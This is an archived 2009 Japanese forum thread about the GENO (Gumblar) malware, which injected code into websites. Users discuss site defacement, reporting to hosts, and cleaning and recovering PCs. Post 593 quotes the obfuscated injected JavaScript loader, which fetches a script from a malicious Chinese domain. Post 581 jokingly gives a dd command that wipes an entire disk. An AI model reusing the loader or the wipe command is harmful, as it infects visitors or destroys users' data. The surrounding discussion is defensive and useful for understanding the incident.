「うるせーから黙ってろ、迷惑なんだよ!」って怒っちゃった感じ
ショップとかのサイトならそのうちどこからもリンク外されるから別にいんじゃねーのww
431:名無しさん@お腹いっぱい。
09/05/24 12:26:38
ふと思ったんだが、NoScriptなどを使わなくても、
「今見ているページとは違う(外部の)ドメインのFlashを読み込まない」
ようにできれば、感染自体は回避できるんじゃないか?
432:名無しさん@お腹いっぱい。
09/05/24 12:26:40
>>426
一般人なら1週間ROMってればできる
池沼だと3年ROMってればできるかも
433:名無しさん@お腹いっぱい。
09/05/24 12:27:11
シェルを開放していなくてFTPだけのサーバーってのもあるか。
暗号化されているFTPにはSFTPだけじゃなくて
FTPSやFTPESもあるよ。
シェルを開放していなくても、こっちなら使えるかも。
XREAはホスト登録する必要があるが、SFTPが使える。FTPESも使えるらしい。
URLリンク(sb.xrea.com)
URLリンク(labs.uechoco.com)
さくらはスタンダード以上・・・
URLリンク(www.sakura.ne.jp)
みんなどこのサーバー使っているんだろうね。
434:名無しさん@お腹いっぱい。
09/05/24 12:28:01
うちのもウイルスバスターなんだけど、ついさっきGENOウイルスについて知った。
バスターもってたら対策しないで安全なのかな?
435:名無しさん@お腹いっぱい。
09/05/24 12:29:40
>>422
一理あるがここの住人に言っても無駄だと思うよ
解ってる人から見たら、”対策しろ”の一言で済む話だからね
前々前スレくらいで一般人にどうやって説明しようか検討してた
まぁ普通はそんなもんでしょ。
436:名無しさん@お腹いっぱい。
09/05/24 12:30:09
バスター使いが製品のクオリティと同様にレベル低いのは何故なんだぜ
437:名無しさん@お腹いっぱい。
09/05/24 12:30:09
>>431
NoScriptの方が簡単臭い
438:422
09/05/24 12:30:12
大漁ですわ^^
439:名無しさん@お腹いっぱい。
09/05/24 12:31:57
おつかれさん
440: ◆.lsSk9mKak
09/05/24 12:32:32
422だけど、じゃあ対策しろって言ってる奴らは、感染した人に何がしてやれるって話よ?
寄ってたかって対策しろじゃ感染するレベルの人になんて解るはずないだろうに
ただうるさいだけだ
441:名無しさん@お腹いっぱい。
09/05/24 12:32:34
ショップサイトなら客が離れてモールのリンクも外されるだろうし
普通のサイトだとしても全部リンク外されるだろうし
インフルエンザに罹って街中でウイルスばら撒いてるのがそんなに楽しいならそのままでOK
442:名無しさん@お腹いっぱい。
09/05/24 12:32:52
ロリポップのサイト漁ったがSFTP検索かけてもでてこねー
443:名無しさん@お腹いっぱい。
09/05/24 12:33:17
>>438439440
浮かれている場合じゃないw
その前にアンカーをおぼえる!
444:名無しさん@お腹いっぱい。
09/05/24 12:34:17
>>443
>>443
>>443,443,443
445:名無しさん@お腹いっぱい。
09/05/24 12:35:49
>>433
最近はexplicitモードを区別してFTPESと呼ぶのか…勉強になったぜ
446:名無しさん@お腹いっぱい。
09/05/24 12:36:22
>>355
なるほどthx
GENOって画像開いて感染するのか?とか気になってたわ
ただのデマかね
447:名無しさん@お腹いっぱい。
09/05/24 12:36:35
>>444
セキュのJane夫の登場w
448:JANE夫@おっぱい。
09/05/24 12:38:51
よんだ?
449:名無しさん@お腹いっぱい。
09/05/24 12:39:47
>>437
いや、NoScriptみたいに処理が重めの奴を使わずにやるには、って意味で。
450:名無しさん@お腹いっぱい。
09/05/24 12:40:27
>>448
巣にカエレw
あ、ここが巣かw
451:名無しさん@お腹いっぱい。
09/05/24 12:41:03
改竄されて攻撃サイトにリダイレクトさせてる時点で
懇切丁寧に説明してやる必要なんてないと思うが
「おたくのウェブサイト開いたらアンチウィルスソフトが警告を出した。どうなってるの?」で十分だろ
後の調査と対策はサイト管理者の責任
452: ◆.lsSk9mKak
09/05/24 12:41:16
>>441
あんた、ふくぜんのブログにコメントした人?
荒らしにしか見えないのもいくつかあるけども。
じゃあ、そこまで言うなら何がしてやれるの?
具体的に何も出来ないならメール送りつけたり
コメントしたりしつこい荒らしと変わらんと思うけどね。
長々とウイルスの説明されたって相手にもされないよ
453:名無しさん@お腹いっぱい。
09/05/24 12:42:25
えっ、
454:名無しさん@お腹いっぱい。
09/05/24 12:43:52
ふくぜんの中の人なの?
455:名無しさん@お腹いっぱい。
09/05/24 12:44:08
なにそれこわい
456:名無しさん@お腹いっぱい。
09/05/24 12:44:40
それが中の人だったら感染などしてないはず
457:名無しさん@お腹いっぱい。
09/05/24 12:45:45
>>449
NoScript程度で重いならOperaでも使った方がよくね?
>>440>>452
対処法が分からない馬鹿は、窓からPC投げ捨てて回線切って首吊っとけばいいと思うよ
458:名無しさん@お腹いっぱい。
09/05/24 12:46:13
感染しちゃった中の人は誰かわかる人に任せるしかないでしょ
それまでサイトは放置されるんだな・・・
459:名無しさん@お腹いっぱい。
09/05/24 12:48:31
>>457
得意げなその態度が一般人からきもいって言われる一因でしょ
窓から捨てる云々も良くみるコピペだし。その前に対策して(させて)あげてね
460:名無しさん@お腹いっぱい。
09/05/24 12:50:00
>>449
外部鯖ドマインを使わないネットはありえナス
461:名無しさん@お腹いっぱい。
09/05/24 12:52:16
>>459
馬鹿じゃなければ、まとめサイトでも見れば対処法が分かる
馬鹿は、金を何万か用意してパソコンレスキューみたいな業者に頼むか
金がなければ窓からPC投げ捨てて回線切って首吊っとくしかない
462:名無しさん@お腹いっぱい。
09/05/24 12:55:06
>>461
その態度が放置ときもい発言を招いてるわけですが。
パソヲタじゃない奴らにまとめとやらをわかるように説明して
463:名無しさん@お腹いっぱい。
09/05/24 12:55:15
情報が不透明だから、完璧な対処の使用法もないからなぁ
464:名無しさん@お腹いっぱい。
09/05/24 12:55:18
とりあえず、ふくぜんに関してはホスティング先のabuseにもメール送っておいたけど、
そっちも反応ないな。
465:名無しさん@お腹いっぱい。
09/05/24 12:55:23
>>459
つまり一切メールしたりコメントつけたりするなって言いたいの?
そうして管理者は気付かず、いつまでも改竄されまま放置されてればいいと
466:名無しさん@お腹いっぱい。
09/05/24 12:56:52
ブログ見に行っちゃったよ
別に荒れていないけど削除したのかな?
467:名無しさん@お腹いっぱい。
09/05/24 12:57:33
>>462
まとめサイト
468:名無しさん@お腹いっぱい。
09/05/24 12:58:02
嵐って程の書き込みは元々無かったと思われ
469:名無しさん@お腹いっぱい。
09/05/24 12:58:03
>>462
まとめ読んでも分からないorまとめがどこにあるのかさえ分からないなら
自分が馬鹿であると素直に認めて有料サポート業者に頼め
470:名無しさん@お腹いっぱい。
09/05/24 13:00:01
まぁブログの2個目までのコメントは無いわな・・・
471:名無しさん@お腹いっぱい。
09/05/24 13:01:47
長文メール云々とか中の人しかわからないような事書いてる時点で・・・
472:名無しさん@お腹いっぱい。
09/05/24 13:02:04
>>465
散発的にきたら気持ち悪いんでないのかね
旅館の中の人もわかってるみたいだし誰かに頼むんじゃね
473:名無しさん@お腹いっぱい。
09/05/24 13:02:55
>>471
何個か前スレにすんごい長文メールあったよ
丁度、ukokkeiが発覚した頃。
474:名無しさん@お腹いっぱい。
09/05/24 13:05:49
>>464
tsukaeru.netってabuse死んでるっしょ。
エラーが返ってきたから。Webフォームから連絡入れておいた。
非ユーザーからの問い合わせは月曜まで放置される可能性が
高いけど。
475:名無しさん@お腹いっぱい。
09/05/24 13:08:34
>>463
攻撃側は常に進化するから特定のウイルスの説明は陳腐化して逆効果
感染の簡易診断やスクリプト検査ではシロ判定される亜種も既に量産体制
しかし何もビビる必要は無い
・ソフトウェアをアップデートして最新にする
・JavaScriptやプラグインを原則無効にする
この2つの基本対策がきちんと出来てる奴は
仮に感染サイトを踏んだとしても対岸の火事で終わってる
476:名無しさん@お腹いっぱい。
09/05/24 13:12:19
>>474
ああ、そうだった。俺もWebフォームで送り直した。
送ったの昨晩だから、確実に明日までは放置されるね。
477:名無しさん@お腹いっぱい。
09/05/24 13:14:12
おらパソオタども感染したから直し方教えろ
つーか俺はオタじゃないからやる気ないからおまえらが責任もって直せ
って言われてもww
478:名無しさん@お腹いっぱい。
09/05/24 13:17:10
>>477
そういう馬鹿って人として生きていけるのだろうか
479:名無しさん@お腹いっぱい。
09/05/24 13:19:26
>>478
残念なことに今現在まで生きてこられたようです。
至極迷惑なことに。
480:名無しさん@お腹いっぱい。
09/05/24 13:20:13
>>478
強毒性の新型インフルエンザで死ぬと思う
おら医者ども感染したから治し方教えろ
つーか俺は医者じゃないからやる気ないからおまえらが責任もって直せ
って言われてもww
481:名無しさん@お腹いっぱい。
09/05/24 13:22:44
増水した川の中州に取り残されて助けられて悪態ついてるDQNのような人種もいるのでねぇ
482:名無しさん@お腹いっぱい。
09/05/24 13:23:39
>>452
長文コメントでウイルス云々言われても、正直お節介な奴と思ってる?
コメ見るまでは気がつかなかったということですよね?
483:名無しさん@お腹いっぱい。
09/05/24 13:27:50
>>474
>>476
お前ら迷惑なんだよ。
484:名無しさん@お腹いっぱい。
09/05/24 13:29:09
>>483
感染気づかずに放置してウィルス媒介所になってるほうが迷惑だから。
485:名無しさん@お腹いっぱい。
09/05/24 13:30:48
その長文メールとやら見せてくれないか
486:名無しさん@お腹いっぱい。
09/05/24 13:30:59
なんかすげーな。
ふくぜんのサイト構築を請け負ってる業者とかだったりするんだろうか。
487:名無しさん@お腹いっぱい。
09/05/24 13:32:31
ふくぜんは問題ない
488:名無しさん@お腹いっぱい。
09/05/24 13:33:56
ふくぜんは被害を被った側だね
489:名無しさん@お腹いっぱい。
09/05/24 13:35:21
うん、だから切れるのもわかるけど
切れる相手を間違えないでネット
490:名無しさん@お腹いっぱい。
09/05/24 13:37:18
無能達に告ぐ!
無能達に告ぐ!
過去のウィルスで騒ぐな
491:名無しさん@お腹いっぱい。
09/05/24 13:37:41
なんか今見たら、ふくぜんのサイトぐしゃぐしゃで文字化けしまくり。
トップページについてはGENOのコードが消えてるっぽいけど、
オンラインで作業してるのか?
492:名無しさん@お腹いっぱい。
09/05/24 13:38:39
>>483
ID出ないと余裕ですねw
493:名無しさん@お腹いっぱい。
09/05/24 13:40:27
>>487
ふくぜんはGoogleやブラウザが警告出してアクセスできないから問題ない
>>488
インフルエンザと同様、被害者が即加害者になるのがウイルスなんですけどね
494:名無しさん@お腹いっぱい。
09/05/24 13:41:36
>>490
君にとって過去のものだったとしても、今こうして感染、被害が広まってる今そんなことは過去もくそもない。
495:名無しさん@お腹いっぱい。
09/05/24 13:42:21
コメントの内容に、ふくぜんに落ち度があるとか何とかだったんじゃないかな
確認のしようが無いんだけど・・・
でも、ここで誰ともわからんのに文句言ってみても始まらない
496:名無しさん@お腹いっぱい。
09/05/24 13:43:05
>>491
俺もぐちゃぐちゃ目撃した。
今リロードしたら直ってた。修復完了か?
497:名無しさん@お腹いっぱい。
09/05/24 13:43:26
>>491
消えているねw作業中かな?
498:名無しさん@お腹いっぱい。
09/05/24 13:44:43
>>493
だからさ、ふくせんでサイト監理してる訳じゃないんでしょ
知らせて上げる事は出来ても対処のしようが無いのとちゃうの?
499:名無しさん@お腹いっぱい。
09/05/24 13:45:04
しかしこの流れで復旧とは…
マジで関係者だったのか
500:名無しさん@お腹いっぱい。
09/05/24 13:45:38
>>496
まだ下の方が変。オフラインで編集すればいいのに。
501:名無しさん@お腹いっぱい。
09/05/24 13:45:42
>>493
>>494
これだから無知は
感染なんて義ろまっていないし被害も出てない
ふくぜんに謝罪しろヴォケ
502:名無しさん@お腹いっぱい。
09/05/24 13:46:37
>>498
知らされても直さないんじゃ意味ないだろ常考
>>501
馬鹿は寝てろ
503:名無しさん@お腹いっぱい。
09/05/24 13:46:43
>>498
ふくぜんに知らせる→ふくぜんからWebページ管理会社へ連絡→対策
504:名無しさん@お腹いっぱい。
09/05/24 13:46:46
修復完了しますた
またのご来店をお待ちしております
505:名無しさん@お腹いっぱい。
09/05/24 13:47:40
>>501
>>494に対してそのレスは明らかにおかしいだろ・・・
506:名無しさん@お腹いっぱい。
09/05/24 13:49:53
関係者がここで文句言いながら修復作業かよ。器用だなw
507:名無しさん@お腹いっぱい。
09/05/24 13:52:42
最初から素直に感染認めて普通に対策の手助け求めてればいらぬ争いは生まないんだよ。
煽りながら対応とか器用なことしなくていいです。
508:名無しさん@お腹いっぱい。
09/05/24 13:54:15
今日は朝からずっと変な流れだなw
509:名無しさん@お腹いっぱい。
09/05/24 13:56:02
俺としては、一度感染したサイトが復旧後に再感染する確率の高さに注目してる
510:名無しさん@お腹いっぱい。
09/05/24 13:57:25
おまえらきもいよ(笑)
511:名無しさん@お腹いっぱい。
09/05/24 13:57:52
>>509
再感染の流れを三行でよろしく
512:名無しさん@お腹いっぱい。
09/05/24 13:58:08
>>510
ご苦労様^^
513:名無しさん@お腹いっぱい。
09/05/24 13:58:12
>>493
ふくぜんにコメントした人ですね
514:名無しさん@お腹いっぱい。
09/05/24 13:59:19
人に迷惑かけといて悪びれもしないって、たしかにきもいね(笑)
515:名無しさん@お腹いっぱい。
09/05/24 13:59:40
窓からPC投げ捨てて回線切って首吊っとくしかない
516:名無しさん@お腹いっぱい。
09/05/24 14:00:20
えっ、なにそれこわい
517:名無しさん@お腹いっぱい。
09/05/24 14:02:02
>>511
直した
残ってた
伝染った
518:名無しさん@お腹いっぱい。
09/05/24 14:02:22
昔の2ちゃんねるのようだ
519:名無しさん@お腹いっぱい。
09/05/24 14:03:07
えっ
520:名無しさん@お腹いっぱい。
09/05/24 14:11:17
最大最強のウイルスは人間なんだな
521:名無しさん@お腹いっぱい。
09/05/24 14:11:18
ああ判った、今朝解析うんぬん行っていた人か>中の人
本当にお客さんに感染していた場合の対処法を知りたかったんだね
522:名無しさん@お腹いっぱい。
09/05/24 14:14:09
>>245>>247>>421>>434
556 :GENO:2009/05/23(土) 11:03:23 ID:cGjzOdFG0 (PC)
>>552-553
ちょっと巡回中に良いタイミングで見かけたので...最新の状況だと、こんな感じです。
martuz_cn_id10_20090517.exe - 30/40
URLリンク(www.virustotal.com)
日本国内で使われている主要なソフトは全て、現時点で元の実行ファイルを検出できるようになっています。
あと、検出名は、元のウイルスが配布されていた日のバージョンによって違ってくるので、参考程度に考えた方が良いです。
感染ファイルの方 - 25/39
URLリンク(www.virustotal.com)
こちらは、主要ソフトの内、TrendMicro(ウイルスバスター)が感染を検出できない結果が出ています。
(ただし、Virustotalで未検出でも、実際には検出できることもありますので、これが絶対の結果ではありません。)
※ 同人板だとなじみが無さそうなので説明すると、ウイルスセキュリティZEROがK7AntiVirus,ウイルスキラーがRisingです。
ですので、既に『パターンファイルを最新に更新した上で、ウイルスチェックをお願いします。』で問題が無い状態まで来ています。
もっとも、ウイルスバスターだけは確認が取れない状況なので、これは誰かが最終確認するのを待つしかありませんが...
523:名無しさん@お腹いっぱい。
09/05/24 14:19:40
正直、新種がどんどん出てくる状況では
「昔のファイルが検出できる」で安全宣言出す行為は
感染拡大に加担してるようなもんだな
524:名無しさん@お腹いっぱい。
09/05/24 14:23:46
一時期、やたらと終息宣言出したがる/出させたがる人続出だったもんなあ
あれは何だったんだろう
525:名無しさん@お腹いっぱい。
09/05/24 14:25:24
とりあえずGENO社員だろと思う事にしている
526:名無しさん@お腹いっぱい。
09/05/24 14:32:45
うめ
527:名無しさん@お腹いっぱい。
09/05/24 14:37:53
ふくぜん直ったみたいだなw
528:名無しさん@お腹いっぱい。
09/05/24 14:42:58
直ったのか?
まだGoogleで遮断されるが
529:名無しさん@お腹いっぱい。
09/05/24 14:44:55
永遠に遮断しておけ
530:名無しさん@お腹いっぱい。
09/05/24 14:53:18
>>527
This page seems to be <suspicious>
531:名無しさん@お腹いっぱい。
09/05/24 15:05:44
>>528
Googleは管理者が申告して、それをGoogle側がチェックするまで解除されないよ。
532:名無しさん@お腹いっぱい。
09/05/24 15:07:31
感染確認したんで、初期化するつもりなんだが
感染後にリカバリ取っても意味はないのか?
533:名無しさん@お腹いっぱい。
09/05/24 15:11:55
>>532
意味わからん
534:名無しさん@お腹いっぱい。
09/05/24 15:21:02
Gumblarとは 【GENOウイルス】 - 意味-解説-説明-定義 : IT用語辞典
URLリンク(e-words.jp)
2009年5月から急激に感染が拡大したコンピュータウイルスの一種。
「GENO」という名称は、国内で早期に感染したパソコンの通販サイトから
ついた通称で、ウイルス対策ソフトベンダーなどでは「Gumblar」や
「JSRedir-R」の名称で呼んでいる。
Gumblarは感染したコンピュータの管理するWebサイトを改ざんし、
感染用のJavaScriptコードを仕掛ける。
このコードはAdobe ReaderやFlash Playerの脆弱性を利用したもので、
これらを最新版に更新していないユーザは、
サイトを閲覧することにより感染する。
Gumblarは感染したコンピュータのネットワーク通信を監視し、
そのユーザがFTPを用いてどこかのWebサイトを管理している場合、
そのパスワードを盗み出してWebサイトを改ざんし、
感染用のコードを埋め込む。
また、感染したコンピュータのWebブラウザの挙動を操り、
Googleの検索結果に悪意あるサイトへのリンクなどを表示させる。
外部から操作できるような仕掛け(バックドア)も埋め込まれてしまう。
535:名無しさん@お腹いっぱい。
09/05/24 15:33:37
念のためにリカバリしようと思うんですが
感染している可能性があるパソコンに入れていたDVDや繋いでいた周辺機器を
GENOウイルスに対応したアンチウイルスソフトでスキャンした結果無事でも、
対応してない亜種とかは感知、駆除できないですか?
あと、もし感染してたら周辺機器やDVDのウイルスは駆除する方法がありますか?
パソコンだとリカバリしかないそうですが、DVDは諦めるしかないんでしょうか。
536:名無しさん@お腹いっぱい。
09/05/24 15:35:40
基本的にデータには付着しないので、データバックアップと書き戻しはOK(HTMLはチェックした方が無難かも)
HDDを外付にしても、削除はできても駆除(Windows本来のファイルに戻すとか、ゴミ設定抹消)はできないので
おとなしくPCリカバリかOS再インストールしとけ。
537:名無しさん@お腹いっぱい。
09/05/24 15:38:58
感染したPCのHDDや感染後に使用したUSBメモリ等のデータは完全消去が原則
素人の大半が感染ディスクからデータを取り出して再感染して復旧作業をやり直す
GENOウイルスの話じゃないけど
金にものを言わせて「PCを買い換える」最終手段を使ったくせに
データを使いまわして即感染させた馬鹿もいたな
538:名無しさん@お腹いっぱい。
09/05/24 15:40:51
>>536>>537
ウイルス感染の可能性でリカバリする場合はバックアップも諦めた方がいいということでしょうか。
539:名無しさん@お腹いっぱい。
09/05/24 15:46:17
>>538
理想論は>>537だが現実的には破棄できないファイルもあるだろうから
必要なファイルはとりあえずバックアップを取って
PCが復旧してからウイルスチェックをして再利用するのは割と日常茶飯事
540:名無しさん@お腹いっぱい。
09/05/24 15:50:08
>>539
ありがとうございます。あと一つだけ質問があるんですが、
テンプレでは駆除はクリーンインストールしかないとありますがリカバリでも大丈夫ですか?
メーカー製のパソコンはクリーンインストールはできないと聞いたのでリカバリしか無理なようなんですが
リカバリでも大丈夫でしょうか。
541:名無しさん@お腹いっぱい。
09/05/24 15:53:07
感染サイトみているとヘアサロン多いな
542:名無しさん@お腹いっぱい。
09/05/24 15:54:21
まったく、ハゲやがって
543:名無しさん@お腹いっぱい。
09/05/24 15:55:08
>>540
パソコン用語 - リカバリとは
パソコンを購入したときの状態に戻す作業のことです。
ググレカス
544:名無しさん@お腹いっぱい。
09/05/24 15:56:08
>>540
とりあえずリカバリして、まだ感染してたら、そのとき考える
ファイルのバックアップも同じ。とりあえずバックアップして、
もしウイルスが残ってて再感染したら、そのとき考える
感染が残ってたら1からやり直しになるけど、運が良ければ復旧する
そんな程度のやり方でも、世の中なんとか回ってます
545:名無しさん@お腹いっぱい。
09/05/24 16:01:51
>>543
メーカーPCのリカバリは、CD/DVDのリカバリディスクを使うとは限らんからな
HDDからのリカバリだと、リカバリ領域が汚染されてる可能性がある
546:名無しさん@お腹いっぱい。
09/05/24 16:06:04
>>543
ググってみたんですがリカバリだとクリーンインストールと比べて感染の可能性が残るかなどが
よくわかりませんでした。
>>544
ありがとうございます、とりあえずやってみます。
今の所GENOチェッカーでもGENOウイルスに対応したアンチウイルスソフトのスキャンでも
検出はされてないんですが、亜種を考え出せばリカバリしてもこのままでも全く感染してないとは
言えない状態ってことでしょうか。
その辺りはあまり考えすぎても今はどうしようもないくらいに思っていればいいような状態ですか。
547:名無しさん@お腹いっぱい。
09/05/24 16:09:28
DtoD
548:名無しさん@お腹いっぱい。
09/05/24 16:09:41
そういえば、インストールCD/DVDからのインストールでも、上書きだと
危ないかもしれないな。Zlkonの時にsystem volume informationに.exe
ファイルが潜伏しているという報告があったんだ。
上書きインストールだとsystem volume informationは保存されるんじゃないかな?
一度パーティションを全消しする再インストールじゃないと不完全な気がする。
549:名無しさん@お腹いっぱい。
09/05/24 16:10:09
ちなみにとあるPCサービス会社にやってもらうと
ウイルス除去→50000ぐらい
リカバリ→30000ぐらい
550:名無しさん@お腹いっぱい。
09/05/24 16:11:25
>>537
プログラムもデータの一種だというなら、そうかもしれんがな。
一般論としては、データを破壊しない。
マクロ型のようにデータに潜むものもあるが、PCリカバリ→WindowsUpdateとセキュリティソフト導入→データ戻しと
正しい手順で行なえば、データに取り付いてるものでも、セキュリティソフトがチェックしてくれるので、
データをバックアップして、あとから書き戻して構いません。
>>537の言うような再感染は、適切なセキュリティソフトを導入せずに、データを戻そうとした場合に発生します。
AutoRun型とかっすね。GENOでは、その型は確認されてないので、心配せずに、データバックアップしてから
リカバリしちゃってください。
>>545
基本的にOSからは見えない領域になってるので、その可能性は著しく低いがな。
>>540
復旧方法は、PCリカバリまたはOS再インストールです。リカバリで問題ありません。
551:名無しさん@お腹いっぱい。
09/05/24 16:13:47
>>546
リカバリと、(HDDフォーマットして行なう)クリーンインストールは等価だと考えていいです。
どちらも、現在のファイルは残りません。
クリーンインストールでも、OS部分の抹消だけ行なうものは、HDDにデータが残っており、セキュリティソフト
導入前に、残されたファイルのうち、感染しているプログラムに触って、再感染するケースも有り得ますが
そこまで心配しなくていいです。
552:名無しさん@お腹いっぱい。
09/05/24 16:15:02
>>548
復元ポイントを作成しない設定にすれば消せますので、そんな心配いらんだろ。
くだらない書込みでageてんじゃねーよ。
553:名無しさん@お腹いっぱい。
09/05/24 16:20:19
>>546
そそ、リスク完全ゼロを目指すそうとすると大掛かりな作業になるけど、
リスクと手間暇時間を天秤にかけて、手軽な方法で博打に出るわけだ
現在感染状態で、運が良ければ回復、運が悪くても感染状態に戻るだけ
だったらあれこれ悩むより、とりあえず勝負をかけたほうが楽だよな
554:名無しさん@お腹いっぱい。
09/05/24 16:26:05
チェッカーやったら尼が104%だったんだが…
対策してありゃ大丈夫かねぇ?
555:名無しさん@お腹いっぱい。
09/05/24 16:28:08
ここの連中が騒ぎすぎなだけです
556:名無しさん@お腹いっぱい。
09/05/24 16:35:47
上の流れ見てると、最近のウイルスって持ち主にも感染するみたいだな
これからはデータだけでなく持ち主も完全に破棄しないと
557:名無しさん@お腹いっぱい。
09/05/24 16:36:58
>>520
558:名無しさん@お腹いっぱい。
09/05/24 16:37:15
SA★TSU★GA★Iですね分かります。
559:名無しさん@お腹いっぱい。
09/05/24 16:37:23
チェッカー自体があんまり信憑性ない(騒ぎに乗じてアフィで稼ごうとしただけな)ので、気にするだけ損です。
対策してありゃ大丈夫だし、今は、本体配布元は死んでるし、気になるなら先にソースを見とけ。
560:名無しさん@お腹いっぱい。
09/05/24 16:41:30
>>550
広義のウイルスでよければ、画像ファイルや圧縮ファイルなんかのデータファイルも存在するけどな
561:名無しさん@お腹いっぱい。
09/05/24 16:43:10
>>49
IPAに通報済み
あと、メールフォームがあったからそこから送ってみた
562:名無しさん@お腹いっぱい。
09/05/24 16:46:43
>>559
ソースではどの部分の記述で判定すればいいのでしょうか?
563:名無しさん@お腹いっぱい。
09/05/24 16:52:27
>>554
スクリプトだらけならそれぐらいの数字すぐ出る
感染サイトは1000パーセントぐらいはじき出すし
564:名無しさん@お腹いっぱい。
09/05/24 17:03:53
ウイルス対策でadobe readerの最新版をダウンロードしたんだけど、
デスクトップに出来た「AdbeRdrUpd911_all_incr.msp」ってパソコンマークみたいなやつは、
一回クリックしてインストール完了したらゴミ箱にすてちゃっていいの?
ずっとおいとかなきゃダメ??
565:名無しさん@お腹いっぱい。
09/05/24 17:04:42
>>562
ウイルスコードの一例。
ちなみにこれは外部jsファイルに巣食ってたヤツ。
URLリンク(up2.viploader.net)
566:名無しさん@お腹いっぱい。
09/05/24 17:06:31
レス遅くなってすみません。
>>550>>551
どうもありがとうございました。
>>553
ありがとうございます、勉強になりました。
回答してくださった方どうもありがとうございました。
567:名無しさん@お腹いっぱい。
09/05/24 17:07:04
誰も使ってないだろうけど一応更新
赤字表示に</html>以降、強調表示にiframeを追加
URLリンク(end.if.land.to)
フォーム作ったけどchromeで何故か貼り付けができない……
url=の後ろにURLでソース表示+怪しい箇所強調表示
URLリンク(end.if.land.to)
とすると単純ソース表示
即席ブックマークレット
javascript:window.location='URLリンク(end.if.land.to)'+escape(location.href);
568:名無しさん@お腹いっぱい。
09/05/24 17:22:35
>>565
ありがとうございます
参考にさせて頂きます
やはり、GENOチェッカーより自力で確認した方が確実ですね
569:名無しさん@お腹いっぱい。
09/05/24 17:32:53
>>3
Adobe Acrobat ReaderとAdobe Readerはバージョンが上がって名前が変わっただけですよね?
570:名無しさん@お腹いっぱい。
09/05/24 17:44:20
>>565
txtでくださいTシャツにします
571:名無しさん@お腹いっぱい。
09/05/24 17:46:14
>>569
いぇs
572:名無しさん@お腹いっぱい。
09/05/24 17:51:49
>>571
どうもです
573:名無しさん@お腹いっぱい。
09/05/24 18:04:08
>>392
ゲストのネットワークをNAT接続かHost onlyにしてサブネットを分ければいい
ブリッジ接続だとヤバいな
574:名無しさん@お腹いっぱい。
09/05/24 18:30:47
>>570
大変お手数ですが、ご自身で感染サイトへ行って取ってきてください。
解析結果はこんな感じ。
URLリンク(www.virustotal.com)
575:名無しさん@お腹いっぱい。
09/05/24 18:35:12
GENOTシャツ
576:名無しさん@お腹いっぱい。
09/05/24 18:47:53
GENOウイルス専用駆除ツールさっさと出せよ
577:名無しさん@お腹いっぱい。
09/05/24 18:56:29
リカバリはCドライブだけで大丈夫?
Dドライブは初心者にはいじり辛そうなんだけど
578:名無しさん@お腹いっぱい。
09/05/24 18:59:29
>>563 サンクス
579:名無しさん@お腹いっぱい。
09/05/24 19:00:35
>>576
ただのHDDフォーマッタになりそう
580:名無しさん@お腹いっぱい。
09/05/24 19:01:03
MalwarebytesかHijackthisでできるだろ
分からないならクリーンインストールでいいよ
ネ板で変なexe作ってた人たちがいたけど
581:名無しさん@お腹いっぱい。
09/05/24 19:06:43
じゃぁ DD for Windows をc:\dd.exe において
c:\>dd if=/dev/zero of=\\?\Device\Harddisk0\Partition0 bs=1M
これであっという間にゼロクリアしてくれる。
582:名無しさん@お腹いっぱい。
09/05/24 19:07:51
面白いと思って書いたの?
583:名無しさん@お腹いっぱい。
09/05/24 19:13:39
すっかりGENOウイルスという名前で定着してるけど、
そもそもGENOの管理者がZolkonにやられてたってこと?
でもって、今GENOウイルスを放置してると、
次の亜種が出たときに真っ先に被害者(加害者?)になり得るってこと?
そこらへんkwsk
584:名無しさん@お腹いっぱい。
09/05/24 19:23:28
もはや由来も知らずに
「GENOウイルス」って名前だけ広まってる状態だよ
「Genocideウイルスの短縮形」みたいな誤解釈も
585:名無しさん@お腹いっぱい。
09/05/24 19:25:57
>>583
Y
Y
586:GENO
09/05/24 19:28:38
>584
GenoSiteういるす、通称ジェノウィル
587:名無しさん@お腹いっぱい。
09/05/24 19:53:50
でもジャノサイドはごろあうしなーw
588:名無しさん@お腹いっぱい。
09/05/24 19:58:49
>>584
でも、由来をしらなくて店名だと知ると
その店が何か悪いことしていると
考える人もいる。
589:名無しさん@お腹いっぱい。
09/05/24 20:01:50
今回の騒動でオレの中では、「ふくぜんウイルス」で定着した。
590:名無しさん@お腹いっぱい。
09/05/24 20:08:11
>>583
zolkon でなくて zlkon
591:名無しさん@お腹いっぱい。
09/05/24 20:12:34
>>588
そう感じる人も出てくるだろうね
利用歴ある俺としては残念だけどさ
592:名無しさん@お腹いっぱい。
09/05/24 20:19:35
流れ切ってスマン
GENOウイルスってDtoD領域に感染しにくい物?
簡単に感染する?
PC中古で買ったんで素人知識しか無くってGENOの存在最近知って
593:名無しさん@お腹いっぱい。
09/05/24 20:25:31
<script
language=javascript><!--
(function(){var u930=':76ar:20a:3d:22Scr:69:70:74Eng:69ne:22:2cb:3d:22
Version:28:29+:22:2cj:3d:22:22:2cu:3dn:61vi:67a:74or:2euser:41:67en:74:3bi:66:28
(u:2e:69:6edexOf:28:22C:68rome:22):3c0):26:26(u:2ein:64:65xOf:28:22Win:22:29:3e0)
:26:26:28u:2e:69n:64exOf(:22N:54:20:36:22):3c0):26:26(d:6fcum:65nt:2ecoo:6b:69:65
:2e:69:6e:64exOf:28:22m:69ek:3d:31:22):3c0):26:26(typeof:28zr:76zt:73):21:3dt:79peo
:66(:22A:22))):7bzr:76zts:3d:22A:22:3beval(:22if(w:69n:64ow:2e:22:2ba+:22:29j:3dj+:
22+a+:22Ma:6aor:22+b+a+:22:4din:6fr:22+b+a+:22Bui:6c:64:22+:62+:22j:3b:22)
:3bdocument:2ewrite(:22:3cscript:20s:72:63:3d:2f:2f:6dar:22+:22tuz:2ecn:2fv:69d:
2f:3fid:3d:22+:6a+:22:3e:3c:5c:2fscript:3e:22):3b:7d';var ED9=u930.replace(/:/g,'%')
var dd1=unescape(ED9);eval(dd1)})();
--></script>
テキトーなとこで改行したけどこれってGENOだよね??
594:名無しさん@お腹いっぱい。
09/05/24 20:27:01
>>592
少なくともGENOウイルスではDtoD領域を弄っていると言う報告は聞いたことが無い
中古だと別のウイルスに感染してたり変な細工されている可能性もあるがね
595:名無しさん@お腹いっぱい。
09/05/24 20:34:25
PC来たら、ネット繋げる前に
GENOチェック
ウイルスソフト入れてスキャン
これで平気ならとりあえず問題無しでおK?
他に問題有る?
596:名無しさん@お腹いっぱい。
09/05/24 20:36:13
ウイルスは入れちゃ駄目だろ
597:名無しさん@お腹いっぱい。
09/05/24 20:36:39
HDD入れ替えれば良いじゃない
どうせ中古HDDなんていつまで持つかわかんないんだし
598:名無しさん@お腹いっぱい。
09/05/24 20:37:44
>>595
問題大あり^^;
